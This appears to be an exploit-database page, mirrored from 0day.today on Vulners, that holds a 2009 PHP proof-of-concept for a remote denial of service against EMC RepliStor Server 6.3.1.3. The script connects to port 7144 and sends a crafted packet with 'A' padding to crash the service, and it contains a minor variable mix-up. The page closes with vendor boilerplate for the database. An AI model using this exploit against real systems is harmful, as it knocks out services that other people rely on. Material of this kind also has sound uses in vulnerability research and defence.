Lucene search
K

EMC RepliStor Server 6.3.1.3 DoS

🗓️ 20 Oct 2009 00:00:00Reported by bellickType 
zdt
 zdt
🔗 0day.today👁 10 Views

EMC RepliStor Server 6.3.1.3 remote denial of servic

Code
================================
EMC RepliStor Server 6.3.1.3 DoS
================================

# Title: EMC RepliStor Server 6.3.1.3 DoS
# CVE-ID: ()
# OSVDB-ID: ()
# Author: bellick
# Published: 2009-10-20
# Verified: yes

view source
print?
<?php
    /*
    EMC RepliStor Server (rep_serv.exe) 6.3.1.3 remote denial of
    service poc
    by Nine:Situations:Group::bellick
      
    */
      
    $host = "192.168.0.1";
    $port = 7144;
      
    $_sock = fsockopen($host, $port, $errno, $errstr, 2);
    if (!$fp) {
        echo "$errstr ($errno)\n";
    } else {
        $_p = "\x54\x93\x00\x00\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41";
        fputs($_sock, $_p);
        fclose($_sock);
    }
?>


#  0day.today [2018-02-19]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation